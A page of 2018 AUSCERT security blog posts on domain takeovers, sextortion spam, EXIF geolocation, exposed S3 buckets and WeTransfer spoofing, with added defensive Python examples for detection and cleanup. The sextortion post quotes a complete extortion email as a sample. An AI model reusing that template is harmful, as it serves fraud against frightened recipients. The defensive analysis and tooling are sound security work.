Blogs

What Scotty Didn't Know – your guide to domain takeovers

19 Oct 2018

Last night, a domain belonging to our PM lapsed, resulting in a cheeky citizen snapping it up [1]. If your business lost control of its domain, what would you do?

Losing your domain can greatly impact business operations – email will stop working, customers won't be able to access your website, and soon the calls and tweets start coming in. In a worst-case scenario, someone with malicious intent can claim the domain, start receiving sensitive business emails, receive password reset emails for online services, and start sending emails as you. Not only does this look unprofessional, but it can significantly impact service to your clients, your access to other services (via email password resets), and business revenue.

Fortunately, prevention is as simple as not letting the renewal get lost in a sea of tasks:
– See if your registrar allows automatic renewal, and make sure your payment details are kept up to date
– Set an alert far enough in advance to get the expense approved and paid
– Don't ignore emails from your registrar, but also don't click links in the email. It is always safer to go directly to their website
– Related to the previous point, watch out for scam emails claiming to be from a registrar. They often use urgent wording to try to get you to click

ICANN is the Internet Corporation for Assigned Names and Numbers. They control generic top level domains (gTLDs) such as .com, .net and .space. The number of gTLDs is expanding, but there are currently over 1900 that have been delegated. ICANN policy allows a 30 day redemption grace period during which the registered name holder can renew a lapsed gTLD.

The .au TLD is a country code top level domain (ccTLD). In Australia, the .au top level domain, which includes .com.au, .gov.au, .net.au and .edu.au, is controlled by auDA – .au Domain Administration Ltd [2]. auDA's domain name renewal policy for lapsed domains is also 30 calendar days after expiry.

Conveniently for potential scammers, there is a public list of expired domain names, updated daily [3]. If someone has taken your .au domain and is trying to sell it back to you, this is called cybersquatting, and it is not allowed under auDA's policies: "A registrant may not register a domain name for the sole purpose of resale or transfer to another entity." [4] In this scenario, you would be able to file a complaint with auDA.

Registering similar domains

So you have awesomebusiness.com.au … but what if someone buys awesomebusiness.com? Or awesomebusiness.tk? Domains are fairly cheap, so it often doesn't hurt to buy the more common ones, like .com or .net. If you follow this route, try not to let them lapse as well! If someone does register a domain that infringes on your trademark, it may be possible to have it de-registered. We recommend speaking with your legal department for advice. AUSCERT is only able to issue takedowns for malicious domains that are used to distribute malware or phishing campaigns.

Subdomain takeovers

It would be remiss to have a post about domains but not mention subdomain takeovers. This often occurs when CNAME records aren't kept up to date. For example, say you have campaign.awesomebusiness.com.au which points to hosting.cloud.com. After the campaign ends you take down the site, but forget to remove the CNAME record. This would allow someone else to establish a service on hosting.cloud.com, and set up a phishing site for your users at campaign.awesomebusiness.com.au. To prevent this, include updating DNS in your decommissioning process, and periodically check your DNS zone file.

While domain threats are not often at the forefront of our minds, a little bit of housekeeping can go a long way to prevent an embarrassing incident in the future.

Charelle.
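The "periodically check your DNS zone file" advice can be automated. The script below is an added example, not code from the AUSCERT post: it parses the CNAME records out of a zone file and reports every record whose target no longer resolves, which is the dangling-record condition the subdomain takeover section describes. The zone text and the resolver table are constructed for illustration (they reuse the post's placeholder names); in production the `resolve` callable would wrap a real DNS lookup and return None on NXDOMAIN.

```python
"""Find dangling CNAME records in a zone file.

Added example for the subdomain-takeover section; it is not code from the
AUSCERT post. The zone text and resolver table are constructed. In production,
`resolve` would wrap a real DNS lookup (for instance dnspython's dns.resolver)
and return None on NXDOMAIN or an empty answer.
"""
from typing import Callable, Dict, List, Optional, Tuple

# Constructed zone using the placeholder names from the post. The campaign
# host has been decommissioned but its CNAME was never removed.
SAMPLE_ZONE = """\
$ORIGIN awesomebusiness.com.au.
$TTL 3600
@           IN  SOA   ns1 hostmaster ( 2018101901 7200 3600 1209600 3600 )
            IN  NS    ns1
ns1         IN  A     192.0.2.53
www         IN  A     192.0.2.10
campaign    IN  CNAME hosting.cloud.com.    ; campaign site, taken down
shop    300 IN  CNAME shop.example-saas.net.
blog        IN  CNAME www
"""

# Constructed resolver table; any name not listed resolves to nothing.
FAKE_DNS: Dict[str, List[str]] = {
    "awesomebusiness.com.au.": ["192.0.2.10"],
    "ns1.awesomebusiness.com.au.": ["192.0.2.53"],
    "www.awesomebusiness.com.au.": ["192.0.2.10"],
    "shop.example-saas.net.": ["198.51.100.7"],
    # "hosting.cloud.com." is deliberately absent
}

Resolver = Callable[[str], Optional[List[str]]]


def fake_resolve(name: str) -> Optional[List[str]]:
    """Stand-in resolver: None models NXDOMAIN or an empty answer."""
    return FAKE_DNS.get(name)


def _fqdn(name: str, origin: str) -> str:
    """Qualify a zone-file name against $ORIGIN ('@' means the origin itself)."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def parse_cnames(zone_text: str) -> List[Tuple[str, str]]:
    """Return (owner, target) FQDN pairs for each CNAME (single-line records only)."""
    origin, last_owner = ".", "@"
    cnames = []
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].rstrip()   # drop comments
        if not line.strip():
            continue
        if line.startswith("$ORIGIN"):
            origin = line.split()[1]
            continue
        if line.startswith("$"):               # $TTL and other directives
            continue
        fields = line.split()
        if line[0] in " \t":                   # blank owner: inherit the previous owner
            owner, rest = last_owner, fields
        else:
            owner, rest = fields[0], fields[1:]
        last_owner = owner
        while rest and (rest[0].isdigit() or rest[0].upper() in ("IN", "CH", "HS")):
            rest.pop(0)                        # optional TTL and class
        if len(rest) >= 2 and rest[0].upper() == "CNAME":
            cnames.append((_fqdn(owner, origin), _fqdn(rest[1], origin)))
    return cnames


def find_dangling(zone_text: str, resolve: Resolver = fake_resolve) -> List[Tuple[str, str]]:
    """CNAMEs whose target no longer resolves: candidates for a takeover review."""
    return [(owner, target) for owner, target in parse_cnames(zone_text)
            if resolve(target) is None]


if __name__ == "__main__":
    for owner, target in find_dangling(SAMPLE_ZONE):
        print(f"DANGLING {owner} -> {target}")
```

A target that still resolves is not proof of safety: many hosting providers answer for any customer hostname and only fail at the HTTP layer with an "unclaimed site" page, so treat this check as the first pass and follow it with a fetch of each CNAME'd hostname during the periodic review.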
[1] https://web.archive.org/web/20181018222134/http://www.scottmorrison.com.au/
[2] https://www.auda.org.au/
[3] https://afilias.com.au/about-au/domain-drop-lists
[4] https://www.auda.org.au/policies/index-of-published-policies/2012/2012-04/

Targeted blackmail campaign gains momentum

17 Aug 2018

Since the dawn of email, spam has constantly pushed our ability to handle arbitrary, unsolicited input. Whether through gauntlets of long-forgotten regexes or the most sophisticated of convolutional neural nets, detecting and blocking spam has been a Sisyphean battle which has consumed countless IT resources.

Not so at AUSCERT. We have the dubious luxury of actively soliciting spam wherever it is to be found. Because of this we're able to watch as campaigns wax and wane, see how they evolve over time, and get a feel for the objectives of the spammers.

Some campaigns are evergreen – fake pharmaceuticals (usually of the male enhancement variety), various advance-fee scams (think Nigerian Prince), phishing for credentials – it's rare a day goes by without examples of these coming across our inbox. Some campaigns are very flavour-of-the-month: for a few months everyone had their own ICO or crypto investment strategy to hawk to any mail socket willing to listen(). Other campaigns are more sporadic. It's not unusual for us to see a short burst of activity on one particular topic or script which goes silent, only to re-emerge later. Sometimes this is to facilitate a transition to new infrastructure, or to replenish their supply of compromised accounts. Other times this can be to spend time reworking the script, or refining their technique – this blog deals with one such instance, where the renewed campaign was so successful that we've seen a large uptick in its output.

This particular campaign is a faux sextortion blackmail. The premise of the blackmail is that the spammer has recorded the recipient visiting a pornographic website, through some vulnerability on the website or the recipient's own computer. Unless the victim pays a sum of cryptocurrency to the spammer, they threaten to release this non-existent video to the victim's family, friends, or colleagues.

The campaign itself is far from new; we have seen minor variations on the same script pop up repeatedly. Recently a new variation emerged, almost exactly the same, but with one small difference: it would present the recipient's password to them. Given that these passwords were usually out of date, and that data breaches and dumps are a great source of email addresses for spam campaigns, it stands to reason that the spammers were simply pulling passwords for a given email from old breaches and inserting them into the email template. In fact, in our case it would seem that if they cannot find a matching password, that portion of the template is filled in with an empty string.

We're certainly not the first to have written about this campaign [1], but we were spurred to write this post due to the increase in its prevalence that we're witnessing. Unfortunately this only means one thing: it's working. We're also now seeing campaigns where the recipient's name and phone number are being used in place of the password. It's not hard to see how, as an unsuspecting recipient, you could easily be fooled into believing the claims made. Indeed, efforts to catalogue and track the transactions of the various wallet addresses used by the spammers prove that it's having the desired effect [2].

Some things you can do to protect yourself against such scams:
– Treat all unsolicited email with a healthy dose of skepticism.
– If you receive any threatening email, take a sentence or two and search for them. This can help you detect if you've received a well-known script or variant.
– Report the email to your IT department if possible.
– Practice good password hygiene. If you know you've used a strong, unique password for each service then you reduce your exposure when one is breached. Consider a password manager.

For reference, here is an example from this campaign that we have received:

It appears that, (), is your password.

May very well not know me and you are probably wondering why you're getting this e-mail, right? actually, I put in place a malware over the adult videos (adult porn) website and guess what happens, you visited this web site to have fun (you really know what What i'm saying is). When you were watching videos, your internet browser started off working like a RDP (Remote Desktop) which provided me accessibility to your screen and web camera. from then on, my software program obtained your complete contacts from your Messenger, Microsoft outlook, Facebook, as well as emails.

What did I really do? I created a double-screen video clip. First part shows the recording you were seeing (you have a good taste haha . . .), and 2nd part shows the recording of your webcam.

what exactly should you do? Well, in my opinion, $1200 is a fair price for your little secret. You will make the payment by Bitcoin (if you do not know this, search "how to buy bitcoin" in Google).

Bitcoin Address: **ADDRESS** (It is case sensitive, so copy and paste it)

Very important: You've got some days to make the payment. (I have a unique pixel in this e-mail, and at this moment I know that you've read through this email message). If I do not get the BitCoins, I will certainly send your videos to all of your contacts including relatives, co-workers, and so forth. Having said that, if I receive the payment, I'll destroy the recording immidiately. If you'd like evidence, reply with "Yes!" and I will definitely mail out your videos to your 6 contacts. It is a non-negotiable offer, that being said don't waste my personal time and yours by answering this message.

[1] https://krebsonsecurity.com/2018/07/sextortion-scam-uses-recipients-hacked-passwords/
[2] https://twitter.com/SecGuru_OTX/status/1022430328647024640
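The post's advice is to recognise the script and report it, and to track the wallet addresses the spammers use. The code below is an added example, not part of the AUSCERT post: it scores a message against the recurring elements of the quoted template, extracts any Bitcoin address for reporting, and masks the "password" before the message is forwarded to IT, so a real credential is not re-spread. The indicator list, weights and threshold are assumptions tuned to the quoted script; the sample messages and the Bitcoin address in them are constructed.

```python
"""Triage heuristics for the sextortion template quoted above.

Added example, not part of the AUSCERT post. Indicators, threshold and the
sample messages (including the Bitcoin address) are constructed assumptions;
tune them on your own mail before relying on the verdict.
"""
import re
from typing import Dict, List

# Legacy (P2PKH / P2SH) address shape: base58, leading 1 or 3, 26-35 chars.
BTC_ADDR = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

# Each indicator is one recurring element of the script quoted in the post.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "claims_password": re.compile(r"\bis your password\b", re.I),
    "webcam_claim": re.compile(r"\bweb ?cam(era)?\b", re.I),
    "adult_site": re.compile(r"\b(adult|porn(ographic)?)\b", re.I),
    "contacts_threat": re.compile(r"\b(contacts|relatives|co-?workers)\b", re.I),
    "crypto_demand": re.compile(r"\bbitcoin\b", re.I),
    "tracking_pixel": re.compile(r"\b(unique|tracking) pixel\b", re.I),
    "deadline": re.compile(r"\b(\d+|some|two|three) (days|hours)\b", re.I),
}
THRESHOLD = 4  # assumption: four or more indicators is a strong match


def analyse(body: str) -> Dict[str, object]:
    """Return a verdict, the matched indicators and any wallet addresses found."""
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(body)]
    addresses = sorted(set(BTC_ADDR.findall(body)))
    if len(hits) >= THRESHOLD and addresses:
        verdict = "likely sextortion"
    elif len(hits) >= THRESHOLD:
        verdict = "suspicious"
    else:
        verdict = "no match"
    return {"verdict": verdict, "indicators": hits, "btc_addresses": addresses}


def redact_password(body: str) -> str:
    """Mask the 'password' in the template's 'It appears that, <x>, is your password'
    phrasing so the message can be forwarded without spreading a real credential."""
    return re.sub(r"(It appears that,\s*)(.*?)(,\s*is your password)",
                  r"\1[REDACTED]\3", body, flags=re.I)


# Constructed sample modelled on the quoted script; the password and the
# address are placeholders, not real values.
SAMPLE_SCAM = """It appears that, Pa55word-EXAMPLE, is your password.
I put in place a malware over the adult videos website. Your internet browser
started working like a RDP which provided me access to your screen and web camera.
My software obtained your complete contacts from your Messenger and emails.
$1200 is a fair price. You will make the payment by Bitcoin.
Bitcoin Address: 1SampLeSampLeSampLeSampLeSampLe12 (It is case sensitive)
You've got some days to make the payment. I have a unique pixel in this e-mail.
If I do not get the BitCoins, I will send your videos to all of your contacts,
including relatives and co-workers."""

# Constructed benign message that shares one incidental feature (a deadline).
SAMPLE_BENIGN = """Hi team, reminder that the quarterly report is due in 3 days.
Please upload the video recording of the meeting to the shared drive."""

if __name__ == "__main__":
    print(analyse(SAMPLE_SCAM))
    print(analyse(SAMPLE_BENIGN))
    print(redact_password(SAMPLE_SCAM).splitlines()[0])
```

The extracted addresses are what a responder would feed into wallet-tracking efforts such as the one cited in [2]; the redaction step exists because the "password" in these messages is frequently a real, if old, credential of the recipient.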

Location, location, location

9 Aug 2018

This week we received an email from a person who was concerned about a picture they had uploaded to their profile within an organisation. They noticed that the GPS coordinates of where the photo was taken were retained in the metadata of the uploaded image. Curious, they started looking at other people's profile images, and discovered coordinates stored in those as well, potentially revealing where these colleagues live.

What is EXIF data?

Apart from the image itself, an image file can store other information such as date, time, camera information and settings, geolocation, and copyright information. For a photographer this information is very useful, and saves having to write it down for each photo. What it also means, though, is that when we take a photo with a camera phone and upload this image to social media, that site now has access to where you are, and at what time you were there. Not only that, but if the website doesn't strip the metadata before republishing, others could also see this information and track your location and movements.

What can I do?

For users:

Many social media websites already strip location and other EXIF data, including (at the time of writing) Facebook, Instagram, LinkedIn and Twitter. That said, many other large sites do not strip this metadata, and it can be difficult to know about smaller services or corporate systems, so as a user it is safer to disable the saving of location information on your device.

On Android, this will vary depending on your phone and version. In your camera application, look for 'Settings', then 'GPS location' or 'Store Location', and turn this option off. You can also disable location services completely by going to 'Settings', then under the 'Personal' heading, select 'Location' and turn it off.

On an iPhone, in 'Settings' go to 'Privacy', then 'Location Services' and turn this option off for the camera.

These steps only disable location information. Time and date stamps, as well as device information, will still be retained. For existing photos on your computer, you can use ImageMagick (https://www.imagemagick.org, cross platform) to batch strip EXIF data from your images:

$ mogrify -strip *

In Windows, you can right click an image, select 'Properties', then the 'Details' tab to see and remove the image's metadata. Alternatively, there are many other image editing tools to choose from.

For administrators:

Please look into stripping metadata when a user uploads an image to your web application, or re-process images so that data isn't available to other users.

Happy (and safe) snapping!

Charelle.
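For administrators who want to strip metadata in the upload path without shelling out to ImageMagick, the following is an added example (not code from the AUSCERT post) of what `mogrify -strip` does for the Exif segment: it walks the JPEG marker segments, reports whether the Exif block carries a GPS IFD pointer (tag 0x8825), and writes a copy with the Exif APP1 segment removed while leaving the image data untouched. The JPEG it operates on is constructed in-line (a valid marker layout with dummy scan data, not a decodable picture).

```python
"""Detect and strip GPS-bearing Exif metadata from a JPEG.

Added example for the EXIF section; not code from the AUSCERT post. It removes
the Exif APP1 segment only, which is the part that carries the GPS IFD, and
keeps every other segment and the compressed image data. The sample JPEG is
constructed below.
"""
import struct
from typing import Iterator, Set, Tuple

APP1, SOS = 0xFFE1, 0xFFDA
GPS_IFD_POINTER = 0x8825            # IFD0 tag that points at the GPS IFD
EXIF_HEADER = b"Exif\x00\x00"


def iter_segments(data: bytes) -> Iterator[Tuple[int, int, int]]:
    """Yield (marker, start, end) for each metadata segment before SOS.
    start..end spans the marker bytes, the length field and the payload."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = (data[pos] << 8) | data[pos + 1]
        if marker == SOS:
            return                              # compressed image data follows
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, pos + 2 + length
        pos += 2 + length


def ifd0_tags(payload: bytes) -> Set[int]:
    """Tag ids present in IFD0 of an Exif APP1 payload (empty if not Exif)."""
    if not payload.startswith(EXIF_HEADER):
        return set()
    tiff = payload[len(EXIF_HEADER):]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        return set()
    ifd0 = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])[0]
    return {struct.unpack(endian + "H", tiff[ifd0 + 2 + 12 * i:ifd0 + 4 + 12 * i])[0]
            for i in range(count)}


def has_gps(data: bytes) -> bool:
    """True when any Exif segment's IFD0 points at a GPS IFD."""
    return any(marker == APP1 and GPS_IFD_POINTER in ifd0_tags(data[start + 4:end])
               for marker, start, end in iter_segments(data))


def strip_exif(data: bytes) -> bytes:
    """Copy the JPEG without its Exif APP1 segment(s); everything else is unchanged."""
    out = bytearray(data[:2])
    pos = 2
    for marker, start, end in iter_segments(data):
        if not (marker == APP1 and data[start + 4:end].startswith(EXIF_HEADER)):
            out += data[start:end]
        pos = end
    out += data[pos:]                           # SOS, scan data and EOI
    return bytes(out)


def _entry(endian: str, tag: int, typ: int, count: int, value: bytes) -> bytes:
    return struct.pack(endian + "HHI", tag, typ, count) + value.ljust(4, b"\x00")


def build_sample_jpeg(with_gps: bool) -> bytes:
    """Constructed JPEG: APP0/JFIF, an Exif APP1 (Make tag, optionally GPSInfo),
    then a dummy SOS and EOI. Not a decodable picture; the marker layout is valid."""
    e = ">"
    entries = [_entry(e, 0x010F, 2, 4, b"Cam\x00")]                 # Make = "Cam"
    if with_gps:
        gps_ifd_off = 8 + 2 + 12 * 2 + 4                              # right after IFD0
        entries.append(_entry(e, GPS_IFD_POINTER, 4, 1, struct.pack(e + "I", gps_ifd_off)))
    ifd0 = struct.pack(e + "H", len(entries)) + b"".join(entries) + struct.pack(e + "I", 0)
    tiff = b"MM\x00\x2a" + struct.pack(e + "I", 8) + ifd0
    if with_gps:                                                      # GPS IFD: GPSVersionID only
        tiff += (struct.pack(e + "H", 1)
                 + _entry(e, 0x0000, 1, 4, b"\x02\x03\x00\x00")
                 + struct.pack(e + "I", 0))
    app1 = EXIF_HEADER + tiff
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8"
            + b"\xff\xe0" + struct.pack(">H", len(jfif) + 2) + jfif
            + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1
            + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
            + b"\x12\x34\x56"                                         # dummy scan data
            + b"\xff\xd9")
```

Like `mogrify -strip`, this discards the whole Exif block, so the Orientation tag goes with the GPS data; if photos must still display the right way up, rotate the pixels before stripping, or rewrite the segment with only the tags you want to keep.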

Insecure AWS S3 buckets – an ongoing target

23 Jul 2018

Recently, AUSCERT has seen an increase in the number of attacks on unsecured cloud infrastructure. One of the most frequently targeted cloud hosting methods is Amazon's Scalable Storage Solution, commonly referred to as AWS S3.

S3 is used to store static assets for public websites, such as images and JavaScript, and is also used as a destination for backup solutions, due to its low storage costs. S3 buckets can be accessed via HTTP/HTTPS, as well as an API that is available to other AWS infrastructure.

However, critically, many buckets have been configured to expose all of their files, as well as a listing of the files in the bucket – a modern equivalent of the open directory listing issue that many misconfigured web servers have suffered from in the past.

Perhaps due to an overload of new practices required when switching to AWS infrastructure, or due to unfamiliarity with the platform, many S3 buckets have been left exposed when they contain sensitive or secret data, such as backups, copies of databases, or private documents. Many of these S3 buckets have been discovered by third parties, which has resulted in some high-profile data breaches. This website maintains a listing of data breaches that were caused by insecure S3 buckets.

Although this issue has been known for a long time, in the last 12 months more tools to enumerate, discover, and even provide public search listings of S3 buckets have become available. This recent trend has prompted AUSCERT to begin scanning AWS for S3 buckets that have easily guessable names relating to our members' organisations.

Amazon themselves have noted this issue and have taken measures to assist users and prevent further compromises on their platform. Last year, after a large breach that affected millions of Dow Jones customers, Amazon sent an email to the account administrator of every AWS account that had publicly accessible S3 buckets. In Amazon's own words:

"While there are reasons to configure buckets with world read access, including public websites or publicly downloadable content, recently, there have been public disclosures by third parties of S3 bucket contents that were inadvertently configured to allow world read access but were not intended to be publicly available. We encourage you to promptly review your S3 buckets and their contents to ensure that you are not inadvertently making objects available to users that you don't intend."

The official AWS blog contains useful information about securing S3 buckets while still allowing access in a controlled manner. See this article, published in March 2018, for more details.

AUSCERT recommends reviewing all of your AWS infrastructure to ensure access controls are appropriate for your uses.

Anthony Vaccaro, Senior Information Security Analyst at AUSCERT
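The review AUSCERT recommends comes down to two objects per bucket: the bucket ACL and the bucket policy. The code below is an added example, not AUSCERT's or AWS's code: it evaluates both for the two ways a bucket becomes world-readable, a grant to the predefined AllUsers or AuthenticatedUsers groups (on a bucket ACL, READ is exactly the open directory listing described above) and a policy statement that allows read or list actions to Principal "*". The inputs have the shape returned by `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` (boto3 returns the same dictionaries); the sample owner ID and bucket name are constructed placeholders.

```python
"""Assess an S3 bucket's ACL and bucket policy for public exposure.

Added example for the S3 post; not AUSCERT's or AWS's code. Inputs follow the
shape of `aws s3api get-bucket-acl` / `get-bucket-policy` output. The sample
ACL, policy and owner ID below are constructed placeholders.
"""
import json
from typing import Any, Dict, List, Optional

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "anyone on the internet",
                 AUTH_USERS: "any AWS account holder"}
LISTING_OR_READ = {"s3:getobject", "s3:listbucket", "s3:*", "*"}


def _as_list(value: Any) -> List[Any]:
    return value if isinstance(value, list) else [value]


def acl_findings(acl: Dict[str, Any]) -> List[str]:
    """Grants to the two predefined public groups. On a bucket ACL, READ lets
    anyone list the bucket and WRITE lets anyone upload into it."""
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        who = PUBLIC_GROUPS.get(grantee.get("URI", "")) if grantee.get("Type") == "Group" else None
        if who:
            out.append(f"ACL grants {grant.get('Permission')} to {who}")
    return out


def _principal_is_everyone(principal: Any) -> bool:
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def policy_findings(policy_json: str) -> List[str]:
    """Allow statements that hand read/list actions to every principal."""
    out = []
    for idx, st in enumerate(_as_list(json.loads(policy_json).get("Statement", []))):
        if st.get("Effect") != "Allow" or not _principal_is_everyone(st.get("Principal")):
            continue
        actions = sorted({a.lower() for a in _as_list(st.get("Action", []))} & LISTING_OR_READ)
        if actions:
            note = " (conditional: review the Condition block)" if st.get("Condition") else ""
            out.append(f"policy statement {st.get('Sid', idx)} allows "
                       f"{', '.join(actions)} to everyone{note}")
    return out


def assess_bucket(name: str, acl: Dict[str, Any],
                  policy_json: Optional[str] = None) -> Dict[str, Any]:
    findings = acl_findings(acl) + (policy_findings(policy_json) if policy_json else [])
    return {"bucket": name, "public": bool(findings), "findings": findings}


# Constructed sample: a backup bucket left both listable (ACL) and downloadable (policy).
SAMPLE_ACL = {
    "Owner": {"ID": "OWNER-CANONICAL-ID-PLACEHOLDER"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-CANONICAL-ID-PLACEHOLDER"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
        "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-backups/*",
    }],
})
PRIVATE_ACL = {"Owner": SAMPLE_ACL["Owner"], "Grants": SAMPLE_ACL["Grants"][:1]}

if __name__ == "__main__":
    print(json.dumps(assess_bucket("example-backups", SAMPLE_ACL, SAMPLE_POLICY), indent=2))
```

To feed it real data: `aws s3api get-bucket-acl --bucket NAME` and `aws s3api get-bucket-policy --bucket NAME --query Policy --output text`. Two caveats: individual objects carry their own ACLs and can be public inside a private bucket, so a full review also walks object ACLs; and AWS later (November 2018) added the account- and bucket-level S3 Block Public Access setting, which overrides both mechanisms and is the simpler control where no public content is intended.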

Malicious emails via WeTransfer

20 Jun 2018

AUSCERT has seen direct evidence of malicious emails being sent via WeTransfer, as part of an ongoing campaign affecting Australian organisations. We have summarised our findings and provided advice, which can be found at the end of this post.

WeTransfer is a legitimate file-hosting service with a simple business model: users can upload a file, enter a recipient email address, and enter a sender email address. The uploaded file will be sent to the recipient with an explanatory email template, and the sender will also receive an email receipt.

However, WeTransfer performs minimal validation on the email addresses provided by users, which is a major security hole. By default, users may enter any sender address. The WeTransfer FAQ makes it clear that they allow address spoofing on purpose:

"Our ease of use is a core value, that's why we allow our users to enter any email address they want. This sometimes has the effect you are experiencing, where someone else uses your email address. Most likely even by mistake!"

An attacker can enter something like the following:

This will send a legitimate-looking file transfer email to both parties, using WeTransfer's branding and legitimate email headers. This means that WeTransfer is allowing targeted phishing and malspam emails to be delivered on the strength of their own brand. This vulnerability, and others, have been known for months.

When AUSCERT contacted WeTransfer to report this security hole, we received a response, the gist of which was:
– They've blocked the sender and their IP address.
– They've removed the malicious file, so nobody can download it.
– They consider this kind of abuse a "very rare effect".
– They have a "new email verification feature". Fill out a form and they'll send a verification token to your email address every time it is used as a sender.
– They can block a specific email address so it cannot be used to send spam.

This is inadequate, for the following reasons:
– Verification of the sender should be the default, not opt-in.
– IP address blacklists provide minimal security.
– It is not the responsibility of an organisation or individual to disallow third-party services from spoofing them.

AUSCERT recommends:
– All emails sent from WeTransfer should be treated as suspicious.
– Until mail blacklists begin to block WeTransfer's emails automatically, flag suspicious emails as junk.
– Mail administrators should consider looking for recent WeTransfer emails and following up with users.
– Malicious emails are sent from noreply@wetransfer.com.
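For the mail-administrator recommendation, the following is an added example, not AUSCERT's or WeTransfer's code: it reads an mbox, keeps the messages whose envelope sender is noreply@wetransfer.com (the address named above) within a lookback window, and records what a responder needs to follow up with each user: recipient, the display name the uploader chose (which, per the FAQ quoted above, is unverified), subject and any download links. The mbox text is constructed; the hosts and addresses in it are placeholders.

```python
"""Pull recent WeTransfer notifications out of a mailbox for user follow-up.

Added example for the mail-administrator recommendation; not AUSCERT's or
WeTransfer's code. The mbox below is constructed; its hosts and addresses are
placeholders.
"""
import re
from datetime import datetime, timedelta, timezone
from email import message_from_string
from email.message import Message
from email.utils import parseaddr, parsedate_to_datetime
from typing import Any, Dict, List

WETRANSFER_SENDER = "noreply@wetransfer.com"    # sender named in the post
LINK = re.compile(r"https?://\S+")


def split_mbox(text: str) -> List[str]:
    """Split mbox text into raw messages on the 'From ' separator lines."""
    return [m for m in re.split(r"(?m)^From .*\n", text) if m.strip()]


def _text_body(msg: Message) -> str:
    """First text/plain part, decoded; '' if there is none."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    for part in parts:
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            return payload.decode(part.get_content_charset() or "utf-8", "replace")
    return ""


def triage(mbox_text: str, now: datetime, lookback_days: int = 30) -> List[Dict[str, Any]]:
    """WeTransfer notifications received in the last `lookback_days` before `now`."""
    since = now - timedelta(days=lookback_days)
    records = []
    for raw in split_mbox(mbox_text):
        msg = message_from_string(raw)
        display, addr = parseaddr(msg.get("From", ""))
        if addr.lower() != WETRANSFER_SENDER or not msg["Date"]:
            continue
        sent = parsedate_to_datetime(msg["Date"])
        if sent < since:
            continue
        records.append({
            "date": sent.isoformat(),
            "to": parseaddr(msg.get("To", ""))[1],
            "claimed_sender": display,             # uploader-controlled, unverified text
            "subject": msg.get("Subject", ""),
            "links": LINK.findall(_text_body(msg)),
        })
    return records


# Constructed mbox: one recent WeTransfer notification impersonating an internal
# team, one unrelated message, and one WeTransfer notification outside the window.
SAMPLE_MBOX = """\
From noreply@wetransfer.com Mon Jun 18 09:12:00 2018
From: "Accounts Payable via WeTransfer" <noreply@wetransfer.com>
To: finance@awesomebusiness.example
Subject: Accounts Payable sent you Invoice_June.zip
Date: Mon, 18 Jun 2018 09:12:00 +1000
Content-Type: text/plain; charset=utf-8

Accounts Payable sent you a file. Download it here:
https://wetransfer.example/downloads/PLACEHOLDER
The link expires on 25 June 2018.

From alice@partner.example Tue Jun 19 14:03:00 2018
From: Alice <alice@partner.example>
To: bob@awesomebusiness.example
Subject: Lunch?
Date: Tue, 19 Jun 2018 14:03:00 +1000
Content-Type: text/plain; charset=utf-8

Pizza at 12:30?

From noreply@wetransfer.com Fri Mar 02 10:00:00 2018
From: "Marketing via WeTransfer" <noreply@wetransfer.com>
To: bob@awesomebusiness.example
Subject: Marketing sent you brochure.pdf
Date: Fri, 02 Mar 2018 10:00:00 +1000
Content-Type: text/plain; charset=utf-8

https://wetransfer.example/downloads/OLDPLACEHOLDER
"""
REVIEW_TIME = datetime(2018, 6, 20, 9, 0, tzinfo=timezone(timedelta(hours=10)))

if __name__ == "__main__":
    for record in triage(SAMPLE_MBOX, REVIEW_TIME):
        print(record)
```

The output is a follow-up list, not a verdict: a genuine transfer and a malicious one look identical at this layer, which is the point of the post, so each recipient has to be asked whether they expected the file, and the links are what you check against the uploader's removal claim.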

Russia, diplomacy and potential repercussions in Australian cyberspace

6 Apr 2018

Background

We recently witnessed the "largest expulsion of Russian diplomats" by 27-odd countries in support of the UK, following the attempted murder of a Russian double agent on British soil. Russia in turn directed threats of retaliatory action at the countries involved, including Australia. Australia has signalled intent to boycott the World Cup, which will be held in Russia this year. With the Gold Coast Commonwealth Games on right now, that may just be sufficient cause for Russian "cyber activists" to direct some nasty traffic our way.

Russia's track record of using cyber attacks in support of its political agenda [1]

– 2007, Estonia. Large scale DDoS attack. Triggered by planned relocation of a Russian World War 2 memorial.
– 2008, Lithuania. Government site defacements. Triggered by the Lithuanian government banning display of Soviet symbols.
– 2008, Georgia. Internal communications shutdown. Triggered by Georgia sending troops to reclaim a breakaway republic supported by Russia. This was followed by a Russian military invasion.
– 2009, Kyrgyzstan. DDoS against two ISPs. Triggered by the need to exert pressure on the government to evict a US military base. It worked!
– 2009, Kazakhstan. DDoS on media outlet. Triggered by release of an article that was critical of Russia.
